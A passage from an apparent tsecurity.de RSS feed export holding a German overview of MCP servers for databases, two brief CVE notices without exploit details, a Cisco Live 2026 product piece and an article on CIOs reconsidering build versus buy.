<p>Bei <a href="https://github.com/googleapis/mcp-toolbox" target="_blank" rel="noreferrer noopener">MCP Toolbox for Databases</a> handelt es sich um einen bemerkenswerten MCP-Server von Google, der als populäre „Sammellösung“ für verschiedene Datenbanktypen dient. Denn dieser Server verbindet LLMs nicht mit einer einzelnen verwalteten Datenbank, sondern vereinheitlicht den LLM-Zugriff auf mehrere Systeme. Die Open-Source-Utility wird mit <a href="https://mcp-toolbox.dev/documentation/configuration/prebuilt-configs/" target="_blank" rel="noreferrer noopener">vorkonfigurierten Einstellungen</a> für knapp 30 verschiedene Datenbanken ausgeliefert – darunter:</p>



<ul class="wp-block-list">
<li>PostgreSQL,</li>



<li>MySQL,</li>



<li>SQL Server,</li>



<li>Oracle Database,</li>



<li>MongoDB,</li>



<li>Redis,</li>



<li>Neo4j,</li>



<li>Snowflake, sowie</li>



<li>die Datenbanken in Google Cloud.</li>
</ul>



<p>Sobald die Datenquellen in einer <code>tools.yaml</code>-Datei definiert sind, können mit der MCP Toolbox strukturierte Abfragen oder semantische Suchen in Datenbanken durchgeführt werden – direkt über eine IDE oder einen Agentic Client und in natürlicher Sprache. Dabei werden Befehle in Aktionen wie <code>list_tables</code> und <code>execute_sql</code> übersetzt.</p>



<p><strong>Zu empfehlen für: </strong>Anwender, die verschiedene Datenbanken in Google Cloud (oder anderswo) nutzen und einen „All-in-One“-MCP-Server brauchen.</p>



<h2 class="wp-block-heading">MongoDB MCP-Server</h2>



<p><a href="https://www.computerwoche.de/article/2796089/was-die-nosql-datenbank-kann.html" target="_blank">MongoDB</a> ist eine populäre, dokumentenorientierte NoSQL-Datenbank. Die verantwortlichen Entwickler haben ebenfalls einen <a href="https://github.com/mongodb-js/mongodb-mcp-server" target="_blank" rel="noreferrer noopener">offiziellen MCP-Server</a> veröffentlicht. Dieser ist sowohl mit der quelloffenen Datenbank als auch mit der gehosteten Cloud-Datenbankplattform MongoDB Atlas kompatibel. Um mit MongoDB-Instanzen zu interagieren, stellt der MCP-Server eine <a href="https://github.com/mongodb-js/mongodb-mcp-server#tool-list" target="_blank" rel="noreferrer noopener">Reihe von Tools</a> bereit. Damit ist es etwa möglich:</p>



<ul class="wp-block-list">
<li>die Datenbank abzufragen,</li>



<li>Informationen zu Sammlungen abzurufen,</li>



<li>Indizes zu erstellen und zu entfernen, oder</li>



<li>Statistiken zur Datenbanknutzung zu erfassen.</li>
</ul>



<p>Für MongoDB-Atlas-Prozesse stehen zudem weitere Tools zur Verfügung, beispielsweise um Benutzer zu erstellen und zu clustern.  </p>



<p>Die Tools des MongoDB MCP-Servers sind standardmäßig schreibgeschützt, können aber für Schreibzugriff umkonfiguriert werden. Diese können lokal genutzt werden, unterstützen aber auch den Streamable-HTTP-Transport für Remote-Server (was allerdings mit größeren <a href="https://www.computerwoche.de/article/4093704/tools-um-mcp-server-abzusichern.html" target="_blank">Sicherheitsbedenken</a> verbunden ist).</p>



<p><strong>Zu empfehlen für:</strong> Alle, die MongoDB nutzen und ihre KI-fähige IDE oder CLI mit mehr Automatisierungsfunktionen ausstatten möchten.</p>



<h2 class="wp-block-heading">Pinecone MCP-Server</h2>



<p>Geht es um native <a href="https://www.computerwoche.de/article/2829270/warum-vektorisierung-die-basis-fuer-genai-ist.html" target="_blank">Vektordatenbanken</a>, ist Pinecone eine performante und weit verbreitete Option – inklusive einer gut durchdachten <a href="https://docs.pinecone.io/reference/api/introduction" target="_blank" rel="noreferrer noopener">API</a> und umfassenden SDKs. Der <a href="https://docs.pinecone.io/guides/operations/mcp-server" target="_blank" rel="noreferrer noopener">Pinecone MCP-Server</a> erweitert diese Möglichkeiten und befähigt Benutzer etwa dazu, die Dokumentation abzufragen und Funktionen über KI-Agenten und KI-fähige IDEs auszuführen. Dabei zeichnet sich der Pinecone MCP-Server durch einfache Konfiguration und Installation aus. Derzeit besteht der Pinecone MCP-Server aus neun MCP-Tools. Diese decken diverse schreibgeschützte Aktionen ab, etwa:</p>



<ul class="wp-block-list">
<li>Knowledge Gathering über die offizielle Pinecone-Dokumentation,</li>



<li>die Abfrage von Vektordatensätzen, Index-Metadaten, Konfigurationen sowie Statistiken, und</li>



<li>Datensätze und Indizes zu aktualisieren, beziehungsweise neu zu erstellen.</li>
</ul>



<p><strong>Zu empfehlen für:</strong> Pinecone-Nutzer, die neue LLM-gestützte Workflows ausprobieren möchten, um Indizes mit Embeddings zu erstellen oder Ergebnisse mithilfe von natürlichsprachlichen Befehlen  überprüfen möchten.</p>



<h2 class="wp-block-heading">Redis MCP-Server</h2>



<p>Als schnelle In-Memory-Datenbank wird Redis vornehmlich für Caching, Echtzeitanalysen und andere Anwendungsfälle eingesetzt, bei denen es auf die Latenz ankommt. Die Macher von Redis stellen ebenfalls einen <a href="https://redis.io/docs/latest/integrate/redis-mcp/" target="_blank" rel="noreferrer noopener">offiziellen MCP-Server</a> zur Verfügung, der Lese-, Abfrage- und Schreibfunktionen realisiert. Entwickler können den Redis MCP-Server über einen LLM-Client nutzen, um Redis-Daten auf Prompt-Basis:</p>



<ul class="wp-block-list">
<li>abzufragen,</li>



<li>zu analysieren oder</li>



<li>einzubetten.</li>
</ul>



<p>Die <a href="https://redis.io/docs/latest/integrate/redis-mcp/">Dokumentation</a> enthält auch einige Beispiel-Prompts für gängige Anwendungsfälle.</p>



<p>Im Gegensatz zu anderen MCP-Servern, die nur einen Teil der Plattformfunktionen abbilden, bietet Redis MCP vollen Support. Laut dem zugehörigen <a href="https://github.com/redis/mcp-redis" target="_blank" rel="noreferrer noopener">GitHub-Repository</a> stellt es so auch kein Problem dar, mit Redis-Konstrukten wie Hashes, Lists, Sets und Streams zu arbeiten. Ein möglicher Nachteil dieser Option: Der Redis MCP-Server bietet bislang keinen Support für Streamable-HTTP-Transport. Bis es soweit ist, ist dieser MCP-Server auf eine lokale Bereitstellung beschränkt.</p>



<p><strong>Zu empfehlen für:</strong> Alle, die einen lokalen MCP-Server für die Arbeit mit Redis-Daten suchen.</p>



<h2 class="wp-block-heading">Snowflake MCP-Server</h2>



<p>Snowflake ist eine in der Cloud gehostete, KI-fähige Datenplattform, die im Enterprise-Umfeld häufig für Data Warehousing, Datenanalysen und Data Engineering eingesetzt wird. Im Vergleich zu anderen Plattformen zeichnet sich Snowflake dabei dadurch aus, dass es vollumfänglich gemanagt wird und strukturierte sowie unstrukturierte Datentypen kombiniert. Der <a href="https://www.snowflake.com/en/developers/guides/getting-started-with-snowflake-mcp-server/" target="_blank" rel="noreferrer noopener">Snowflake MCP Server</a>, der über <a href="https://github.com/Snowflake-Labs/mcp" target="_blank" rel="noreferrer noopener">GitHub</a> verfügbar ist, lässt sich für diverse Standardoperationen der Snowflake-Plattform einsetzen. Dazu gehören etwa:</p>



<ul class="wp-block-list">
<li>„Fuzzy“-Suchen über Snowflakes Cortex Search in allen Datensätzen, sowie</li>



<li>semantische Abfragen strukturierter Daten mithilfe von Cortex Analyst.</li>
</ul>



<p>Zu den weiteren Funktionen gehören Objektmanagement-Prozesse – also Datensätze zu erstellen, zu aktualisieren oder zu löschen. Der MCP-Server kann darüber hinaus weitere agentenbasierte Funktionen realisieren, etwa SQL-Anweisungen für Backend-Datenbanken zu generieren und auszuführen. Der Snowflake MCP-Server ist dabei sowohl gut durchdacht als auch umfassend dokumentiert.</p>



<p><strong>Zu empfehlen für:</strong> Anwender, die bereits mit Snowflake arbeiten.</p>



<h2 class="wp-block-heading">Supabase MCP-Server</h2>



<p>PostgreSQL ist eines der beliebtesten und bewährtesten objektrelationalen, SQL-basierten Datenbanksysteme. Seiner aktiven <a href="https://leaddev.com/technical-direction/postgresql-database-quietly-ate-world" target="_blank" rel="noreferrer noopener">Open-Source-Community</a> sei Dank wurde PostgreSQL über Jahrzehnte hinweg weiterentwickelt. Aufgrund des quelloffenen Charakters gibt es jedoch keinen „offiziellen“ MCP-Server für die Plattform. Anthropic hatte ursprünglich zwar eine Referenzimplementierung entwickelt, diese ist jedoch <a href="https://github.com/modelcontextprotocol/servers-archived/tree/main/src/postgres" target="_blank" rel="noreferrer noopener">mittlerweile archiviert</a>.</p>



<p>Stattdessen bieten auf PostgreSQL aufbauende Datenbankplattformen <a href="https://dbhub.ai/blog/state-of-postgres-mcp-servers-2025" target="_blank" rel="noreferrer noopener">verschiedene Varianten</a> von MCP-Servern an. Diese unterscheiden sich hinsichtlich ihrer Herstellerneutralität und Spezifität. Eine bemerkenswerte Option ist der <a href="https://github.com/supabase-community/supabase-mcp#database" target="_blank" rel="noreferrer noopener">MCP-Server von Supabase</a>, einer Cloud-basierten „Backend-as-a-Service“- und Postgres-Entwicklungsplattform. Der Supabase MCP Server verbindet KI-Agenten mit Supabase-Projekten und ermöglicht es Entwicklern, Befehle in natürlicher Sprache zu erteilen, um:</p>



<ul class="wp-block-list">
<li>Tabellen zu verwalten,</li>



<li>Daten abzufragen,</li>



<li>Protokolle abzurufen, und</li>



<li>Konfigurationsinformationen einzusehen.</li>
</ul>



<p>Allerdings gibt es noch kein finales Release des MCP-Servers von Supabase, weswegen einige Funktionen noch experimentell sind.</p>



<p><strong>Zu empfehlen für:</strong> Entwickler, die Supabase nutzen und nach einem MCP-Server suchen, um KI-Assistenten mit Postgres-Datenbanken zu verbinden – auf experimenteller Basis.</p>



<h2 class="wp-block-heading">Weitere MCP-Serveroptionen für Datenbanken</h2>



<p>Neben den offiziellen MCP-Servern mit Anbieter-Support stehen auch zahlreiche MCP-Server für weitere Datenbankplattformen und -typen zur Verfügung. Zum Beispiel:</p>



<ul class="wp-block-list">
<li><a href="https://github.com/bytebase/dbhub" target="_blank" rel="noreferrer noopener">DBHub</a>, ein MCP-Server, der den LLM-Zugriff über verschiedene Datenbanktypen hinweg bündelt und mit MySQL, PostgreSQL, SQL Server, MariaDB und SQLite kompatibel ist.</li>



<li>Der <a href="https://github.com/benborla/mcp-server-mysql">MCP Server for MySQL</a>, der vom deutschen Full-Stack-Entwickler <a href="https://benborla.dev/">Ben Borla</a> entwickelt und für Claude Code optimiert wurde.</li>



<li>Die Supabase-, respektive Postgres-Alternativen <a href="https://github.com/pgEdge/pgedge-postgres-mcp/" target="_blank" rel="noreferrer noopener">pgEdge Postgres MCP</a>, <a href="https://neon.com/docs/ai/neon-mcp-server" target="_blank" rel="noreferrer noopener">Neon MCP Server</a> und <a href="https://github.com/crystaldba/postgres-mcp" target="_blank" rel="noreferrer noopener">Postgres MCP Pro</a>.</li>



<li>Die auf Vektordatenbanken ausgelegten MCP-Server von <a href="https://docs.weaviate.io/weaviate/mcp/docs-mcp-server" target="_blank" rel="noreferrer noopener">Weaviate</a> und <a href="https://milvus.io/docs/milvus_and_mcp.md" target="_blank" rel="noreferrer noopener">Milvus</a>.</li>
</ul>



<p>(fm)</p>



<p><strong>Dieser Artikel ist </strong><a href="https://www.infoworld.com/article/4181843/10-mcp-servers-to-connect-llms-with-databases.html" target="_blank"><strong>im Original</strong></a><strong> bei unserer Schwesterpublikation Infoworld.com erschienen.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-3297 | Softaculous Page Builder Plugin up to 2.0.9 on WordPress cross site scripting (EUVD-2026-36646)]]></title>
<description><![CDATA[A vulnerability was found in Softaculous Page Builder Plugin up to 2.0.9 on WordPress. It has been classified as problematic. This affects an unknown part. The manipulation leads to cross site scripting.

This vulnerability is listed as CVE-2026-3297. The attack may be initiated remotely. There i...]]></description>
<link>https://tsecurity.de/de/3596094/sicherheitsluecken/cve-2026-3297-softaculous-page-builder-plugin-up-to-209-on-wordpress-cross-site-scripting-euvd-2026-36646/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3596094/sicherheitsluecken/cve-2026-3297-softaculous-page-builder-plugin-up-to-209-on-wordpress-cross-site-scripting-euvd-2026-36646/</guid>
<pubDate>Sat, 13 Jun 2026 21:21:08 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/softaculous:page_builder_plugin">Softaculous Page Builder Plugin up to 2.0.9</a> on WordPress. It has been classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This affects an unknown part. The manipulation leads to cross site scripting.

This vulnerability is listed as <a href="https://vuldb.com/cve/CVE-2026-3297">CVE-2026-3297</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-50089 | Aqara IAM SSO Gateway up to 3.1/6.1 gw-builder.aqara.com redirect (EUVD-2026-36479)]]></title>
<description><![CDATA[A vulnerability labeled as problematic has been found in Aqara IAM SSO Gateway up to 3.1/6.1. This issue affects some unknown processing of the component gw-builder.aqara.com. Executing a manipulation can lead to open redirect.

This vulnerability is registered as CVE-2026-50089. It is possible t...]]></description>
<link>https://tsecurity.de/de/3594504/sicherheitsluecken/cve-2026-50089-aqara-iam-sso-gateway-up-to-3161-gw-builderaqaracom-redirect-euvd-2026-36479/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3594504/sicherheitsluecken/cve-2026-50089-aqara-iam-sso-gateway-up-to-3161-gw-builderaqaracom-redirect-euvd-2026-36479/</guid>
<pubDate>Fri, 12 Jun 2026 22:34:56 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/aqara:iam_sso_gateway">Aqara IAM SSO Gateway up to 3.1/6.1</a>. This issue affects some unknown processing of the component <em>gw-builder.aqara.com</em>. Executing a manipulation can lead to open redirect.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2026-50089">CVE-2026-50089</a>. It is possible to launch the attack remotely. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[How Jeetu Patel made Cisco unrecognizable]]></title>
<description><![CDATA[Cisco Live 2026 is in the books, and it was “prove it” time for a promise made 24 months ago. At Cisco Live 2024, Chief Product Officer Jeetu Patel promised that Cisco would be unrecognizable as a company—in a positive way—in two years. The innovation payload at the event suggests he has largely ...]]></description>
<link>https://tsecurity.de/de/3593888/it-security-nachrichten/how-jeetu-patel-made-cisco-unrecognizable/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3593888/it-security-nachrichten/how-jeetu-patel-made-cisco-unrecognizable/</guid>
<pubDate>Fri, 12 Jun 2026 17:29:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><a href="https://www.ciscolive.com/">Cisco Live 2026</a> is in the books, and it was “prove it” time for a promise made 24 months ago. At Cisco Live 2024, Chief Product Officer Jeetu Patel promised that <a href="https://www.cisco.com/">Cisco</a> would be unrecognizable as a company—in a positive way—in two years. The innovation payload at the event suggests he has largely delivered on that pledge. Cisco is repositioning itself from a holding company of products and dashboards to a unified, AI-native infrastructure platform, with Cloud Control as the control plane, Cisco IQ as the CX brain, and Secure Networking as the glue binding it all together.</p>



<p>The shift is not just about new features; it is about a new operating model. Instead of humans clicking through a sprawl of consoles, Cisco is building an environment where human operators and AI agents share the same data, context, and system of action, with humans staying in control. For longtime Cisco customers, the result is a company that, in fact, looks and feels very different from the one Patel inherited.</p>



<h2 class="wp-block-heading">From dashboard sprawl to Cloud Control</h2>



<p>The most visible proof point of the new Cisco is <a href="https://www.networkworld.com/article/4180810/what-is-cisco-cloud-control-and-why-should-customers-care.html">Cloud Control</a>, the unified management plane that now spans networking, security, compute, observability, collaboration, and an expanding ecosystem of third-party tools. Cisco is careful to note that this is not just another single pane of glass but an active execution environment with policy and identity embedded in the control path, designed from the ground up for humans and AI agents to operate infrastructure together.</p>



<p>Patel’s demo underscores how far Cisco has come from its historical dashboard sprawl. When operators land in Cloud Control, they see a familiar, ChatGPT‑style interface with three modes: Assistant, Canvas, and Actions. Assistant lets operators converse with the platform in natural language. Canvas provides a multiplayer workspace where humans and agents can investigate and resolve issues together. Actions become the mission control for supervising what agents propose and execute.</p>



<p>Crucially, Cloud Control surfaces shared platform services such as inventory and topology across the entire Cisco estate and exposes product tiles for Meraki, Intersight, security services, Splunk, Webex Control Hub, and Cisco IQ, all accessible with a single login. Instead of bouncing between multiple dashboards and authentication domains, operators can move seamlessly between platform services and product experiences within the same environment. For customers who have lived with overlapping portals and inconsistent workflows, this alone makes Cisco feel fundamentally different.</p>



<h2 class="wp-block-heading">Cloud Control as an AI harness, not a console</h2>



<p>Under the hood, Cloud Control is built on a shared data fabric that correlates telemetry across users, devices, applications, networks, and threats. That fabric fuels both human decision-making and agentic automation. Cisco describes this evolution as moving from “infrastructure as code” to “infrastructure as a harness.” Rather than relying solely on scripts and playbooks written by humans, Cloud Control becomes the governed substrate where AI agents can safely observe, reason, and act on real systems.</p>



<p>That harness appears in three visible dimensions. First, AI Canvas provides the workspace where humans and agents co-investigate incidents, with context persisting across shifts and escalations so nothing is lost. Second, Cloud Control Studio offers Agent Builder and App Builder, which let customers and partners build their own agents and applications on top of Cisco’s data, policy, and control plane using natural language and embedded coding assistants. Third, everything built in Studio—plus partner solutions—flows into the Cloud Control Marketplace, where integrations from dozens of ecosystem partners are already available.</p>



<p>For enterprises, the net effect is that Cloud Control shifts from a place to click through settings to the “secure harness” for agentic operations: a governed environment where AI agents can be deployed, monitored, constrained, and audited end-to-end. That is a very different proposition from the traditional network management console.</p>



<h2 class="wp-block-heading">CX and products finally share a brain</h2>



<p>Historically, <a href="https://www.cisco.com/site/us/en/services/support">Cisco’s Customer Experience (CX)</a> organization (services) and product groups have often felt like parallel universes. Services were layered on top of products rather than tightly integrated into how those products operated. Cisco IQ changes that dynamic by placing CX capabilities directly within the same Cloud Control environment where the products themselves live and by wiring CX workflows into the same telemetry and policy plane. This is notable as Cisco IQ isn’t yet another dashboard but an integrated part of Cloud Control.</p>



<p>Cisco IQ is positioned as the AI‑powered delivery vehicle for support and professional services. The goal is to give customers “complete landscape clarity,” proactive resilience, rapid resolution, and contextualized services. It runs as a SaaS platform, with an on‑premises deployment option for customers with strict data sovereignty requirements. By tapping the shared data fabric, Cisco IQ can inventory assets whether they are deployed or still in the warehouse, flag risks before customers experience issues, and benchmark an organization’s posture against anonymized peers by vertical, market segment or geography.</p>



<p>New capabilities, including Resilient Infrastructure Services and Quantum Ready Assessments, further underscore the integration of CX and product engineering. Resilient Infrastructure Services uses a three-step framework: Exposure Assessment, Infrastructure Modernization, and Defense Resiliency to help customers prepare for frontier-model threats. Quantum Ready Assessments, delivered through Cisco IQ, identify assets most exposed to “harvest now, decrypt later” attacks and map a path to quantum-safe infrastructure. Putting CX’s “brain” into Cloud Control and connecting it to the same data and AI models that drive operations is both a cultural and an architectural shift.</p>



<h2 class="wp-block-heading">Secure Networking as the integration proof point</h2>



<p>If you want a single domain that illustrates how integrated the new Cisco has become, look at Secure Networking. Cisco’s stated vision is to embed security directly into the fabric of the infrastructure, from silicon through the network to operations, rather than treating it as a separate stack. That strategy manifests in several concrete ways.</p>



<p>Live Protect, described internally as a “digital immune system,” applies precise compensating controls to Cisco products in production to protect them from newly discovered vulnerabilities at runtime. It does so without reboots, upgrades, or maintenance windows. The controls are narrowly targeted to avoid performance impact and minimize false positives. Live Protect is already shipping on Nexus 9000 switches and expanding across the portfolio, including campus switches, tightening the feedback loop between vulnerability discovery and mitigation from weeks to minutes.</p>



<p>Hybrid Mesh Firewall extends a unified security policy across networks, applications, and both Cisco and third-party firewalls, limiting the blast radius when something goes wrong. At the same time, Cisco is embedding post-quantum crypto libraries, secure boot, and trust anchors across its core portfolio, and has committed to enabling quantum-safe communications capabilities across most core products by December 2026. New enterprise and data center routers, switches, and firewall series are launching as “quantum-safe by default.”</p>



<p>All of this is orchestrated through Cloud Control, the security command center for a post-Mythos era, with Splunk providing the telemetry backbone and agentic SOC and SRE capabilities to detect, triage, and respond at machine speed. Secure Networking is no longer just about point firewalls and SD-WAN; it has become the spine that ties Cisco’s networking, security, observability, and AI assets into a coherent platform.</p>



<h2 class="wp-block-heading">Multicloud Fabric: networking as a service for AI</h2>



<p>Another hallmark of the new Cisco is a willingness to deliver networking as a managed fabric rather than a toolkit that customers must stitch together themselves. Multicloud Fabric, introduced as a network‑as‑a‑service offering delivered through Cloud Control, illustrates this shift.</p>



<p>Multicloud Fabric gives enterprises a single fabric for secure site-to-cloud and cloud-to-cloud networking, with Cisco operating virtual points of presence across major cloud providers and regions. Customers can onboard sites and cloud environments, define intent-based connectivity, attach security policies, and monitor performance “with one button” from Cloud Control, instead of building and maintaining their own hub-and-spoke architectures. Security and observability are built in—Zero Trust routing, cloud firewall service chaining, and ThousandEyes agents embedded in each point of presence—so the network is no longer a passive pipe but part of the AI intelligence stack.</p>



<p>This matters because AI-first applications increasingly chain inference across multiple clouds and data sources. Cisco’s own research shows that these agentic workflows can generate many times more network traffic than manual equivalents, with much of it being latency-sensitive inference. Multicloud Fabric, operated as a service and integrated into the same Cloud Control environment, is Cisco’s answer to this new reality.</p>



<h2 class="wp-block-heading">What this means for customers</h2>



<p>Cisco has spent four decades building category-leading products, from Meraki and Nexus to Webex and ThousandEyes. But the company’s biggest opportunity has always been in how those pieces work together. As Patel has said, tightly integrated and loosely coupled. Cloud Control, Cisco IQ, Multicloud Fabric, and Secure Networking suggest the product organization is finally closing that gap, turning dashboards into agentic workflows and discrete boxes into a secure harness for the AI era.</p>



<p>For customers, Cisco’s transformation matters because it changes the operating model, not just the product lineup. Cloud Control gives IT teams a single management plane across networking, security, observability, collaboration, and services, replacing the fragmented dashboard experience that has long complicated Cisco environments. That should make operations faster and simpler, but it also raises the bar for customers.</p>



<p>As Cisco pushes AgenticOps, AI Canvas, Live Protect, and Cisco IQ into the mainstream, IT teams will need to shift from manually managing tools to supervising agents, setting policy guardrails, and validating machine-speed actions. That shift will demand new skills in prompt design, policy modeling, risk scoring, and governance, especially as agents propose and test more changes before humans ever click “approve.”</p>



<p>It also means customers should view Cisco less as a best-of-breed product and more as an integrated platform. The more of the Cisco estate that is tied to Cloud Control, the more value customers should derive from shared telemetry, unified workflows, embedded security, and cross-domain automation—especially in areas like Secure Networking and multicloud operations. Conversely, customers that remain heavily heterogeneous will need clear integration strategies and governance models to ensure third-party tools plug safely into the harness.</p>



<p>Finally, this new Cisco has the potential to reduce one of the biggest pain points enterprise buyers have faced for years: complexity. If the company can deliver on its vision of one login, one view, tighter product integration, and CX services finally aligned with the product groups, customers may find that Cisco is not only unrecognizable in a positive way but also easier to buy, deploy, and operate than at any point in its history.</p>



<h3 class="wp-block-heading">Read more stories from Cisco Live 2026</h3>



<ul class="wp-block-list">
<li><a href="https://www.networkworld.com/article/4180842/cisco-sees-quantum-networking-as-the-future-of-networking.html">Cisco sees quantum networking as the future of networking</a></li>



<li><a href="https://www.networkworld.com/article/4180810/what-is-cisco-cloud-control-and-why-should-customers-care.html">What is Cisco Cloud Control and why should customers care?</a></li>



<li><a href="https://www.networkworld.com/article/4179942/cisco-live-the-network-is-back-and-ai-rewrote-the-rules.html">Cisco Live: The network is back, and AI rewrote the rules</a> </li>



<li><a href="https://www.networkworld.com/article/4179673/cisco-brings-agentic-ops-platform-and-security-overhaul-to-cisco-live.html">Cisco brings agentic ops platform and security overhaul to Cisco Live</a></li>



<li><a href="https://www.networkworld.com/article/4181727/how-cisco-it-cut-observability-costs-by-86-and-eliminated-major-network-outages.html">How Cisco IT cut observability costs by 86% and eliminated major network outages</a></li>
</ul>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why CIOs should reopen the build vs. buy question]]></title>
<description><![CDATA[Many companies are still buying software for workflows that define how they compete. That used to be a rational way to control costs and reduce risk. Increasingly, though, it’s becoming a quiet way to standardize away differentiation.



For most of the last 20 years, the CIO’s answer to build ve...]]></description>
<link>https://tsecurity.de/de/3593059/it-nachrichten/why-cios-should-reopen-the-build-vs-buy-question/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3593059/it-nachrichten/why-cios-should-reopen-the-build-vs-buy-question/</guid>
<pubDate>Fri, 12 Jun 2026 12:04:43 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Many companies are still buying software for workflows that define how they compete. That used to be a rational way to control costs and reduce risk. Increasingly, though, it’s becoming a quiet way to standardize away differentiation.</p>



<p>For most of the last 20 years, the CIO’s answer to build versus buy was clear: unless you’re a software company, don’t build. Buy a SaaS product, integrate it into the stack, and reserve scarce engineering capacity for the few places where custom work is unavoidable. That advice was rational. It protected companies from fragile custom systems, undocumented dependencies, runaway maintenance costs, and the shadow applications that later became operational liabilities.</p>



<p>But defaults age. When they do, leaders often continue defending them long after the conditions that made them useful have changed. The buy-default is reaching that point. The case for buy hasn’t disappeared, but its status as the automatic default has, and the CIO who continues to default to buy without revisiting why is no longer protecting the business from risk but protecting an assumption that’s quietly stopped being load-bearing.</p>



<h2 class="wp-block-heading">What changed</h2>



<p>Three shifts have moved the math, and the technology side of each one gets the headlines. The business consequence is the part the CIO must act on.</p>



<p>The first shift is cost. AI-assisted development has compressed the time from idea to working software from quarters to weeks, and in some cases prototypes that once required a formal six-figure engagement can now be produced by a small team in a sprint, or by a capable operator over a weekend. Productivity surveys of AI-assisted developers put the gain in the 70 to 90 percent range on routine engineering tasks, and several large technology firms now report that AI-generated code accounts for up to 40% of new commits. The business consequence is that workflows previously too expensive to customize are now economically viable. The custom build is no longer reserved for the few capabilities the business can’t live without. It’s available, in principle, for any capability where the off-the-shelf product forces a meaningful compromise.</p>



<p>The second is who can build. The <a href="https://www.cio.com/article/4136302/how-to-get-ai-democratization-right.html?utm=hybrid_search">democratization</a> of software development is no longer a category of marketing slide. Gartner has been writing for years about fusion teams and the rise of business-side technologists, and the AI generation of coding tools has accelerated that trajectory beyond what most enterprise architecture functions are tracking.</p>



<p>Recent usage data on AI-assisted coding platforms suggest that roughly 65% of users don’t come from a developer background. They sit in operations, marketing, and finance, and they increasingly produce working internal applications, not just demos or toys. The business consequence is that <a href="https://www.cio.com/article/4097339/your-next-big-ai-decision-isnt-build-vs-buy-its-how-to-combine-the-two.html?utm=hybrid_search">build decisions</a> will happen whether CIOs govern them or not. The CIO who assumes building still requires hiring a software team is operating on a labor market description that no longer matches reality, and is also operating on the assumption that the build-or-no-build decision still sits inside IT. It doesn’t.</p>



<p>The third shift is what gets exposed. The traditional reasons custom builds failed haven’t vanished. Authentication, scalability, recoverability, security, and maintainability are still real engineering disciplines, and they still consume real effort. What’s changed is they’re increasingly available as managed services, embedded primitives, or platform features.</p>



<p>Authentication can be subcontracted to a specialist provider. Compliance-aware data storage can be procured on a credit card. Documentation can be generated alongside the code it documents. The business consequence is that the risk has shifted from can we build it to can we govern what we build. That’s a different question, and most organizations aren’t yet structured to answer it.</p>



<p>The combination of those three shifts has done something the industry hasn’t fully digested yet: not eliminating the case for buy but eliminating the case for buy as automatic default.</p>



<h2 class="wp-block-heading">Where the case for build now holds</h2>



<p>This isn’t an argument that organizations should now build everything. The places where buy was the right answer for so many years remain the places where it’s still the right answer today.</p>



<p>For commodity workflows, accounting, payroll, calendaring, document storage, identity management, and the common operations of any business, the <a href="https://www.cio.com/article/4146669/is-ai-the-end-of-saas-as-we-know-it.html?utm=hybrid_search">SaaS market</a> wins decisively. The advantage of building these is small, the cost of maintaining them is real, and the supply of mature products is strong. CIOs are still correct to push back when a business unit proposes building its own ERP. That hasn’t changed, and it won’t.</p>



<p>What has changed is the second category — the workflows that aren’t commodity, the processes that distinguish the business from its competitors, and the operating model details that get bent around the limitations of off-the-shelf systems because no vendor has built a product that matches the actual shape of the work.</p>



<p>In that category, buying has always been a compromise. CIOs accepted the compromise because the alternative was building, and building was unaffordable. With the cost of building no longer prohibitive, that compromise becomes a deliberate choice rather than an unavoidable one. In the workflows where the business is supposed to be different from its competitors, accepting a vendor’s idea of how the work should be done isn’t a neutral position but a slow erosion of the differentiation the business is presumably trying to defend.</p>



<p>The CIO’s job is also to tell the difference between these requests, where buy still wins and the buy-default ones are now obstacles to the business’s competitive position.</p>



<p>This can’t become another category of decisions quietly delegated to IT. If a workflow defines how the business competes, the accountable owner must be the business leader who owns that capability. The CIO should own the architecture, guardrails, risk model, and integration logic, and the business should own the value, adoption, and operating consequences. When that split isn’t explicit, accountability disappears, and the build-versus-buy decision becomes another technology argument with business consequences no one owns.</p>



<h2 class="wp-block-heading">The risks have moved, not disappeared.</h2>



<p>It’d be irresponsible to write this without naming what hasn’t changed. Custom builds still fail when the people building them ignore non-functional requirements. Independent security reviews of AI-generated code report basic failure rates approaching half of the samples examined, with leaked secrets, hardcoded credentials, and misconfigured access controls turning up routinely when the builder isn’t a security practitioner.</p>



<p>Citizen developers still produce systems that look like they work and turn out to be ungoverned, undocumented, and unmaintainable. <a href="https://www.cio.com/article/4120070/how-learning-enterprises-compete.html?utm=hybrid_search">The single-point-of-failure problem</a>, where the entire build lives in the head of one person who eventually leaves, isn’t theoretical. Most CIOs have either inherited a build like that or watched a peer do so. The reflexes that produced the buy-default aren’t arbitrary, they’re scar tissue.</p>



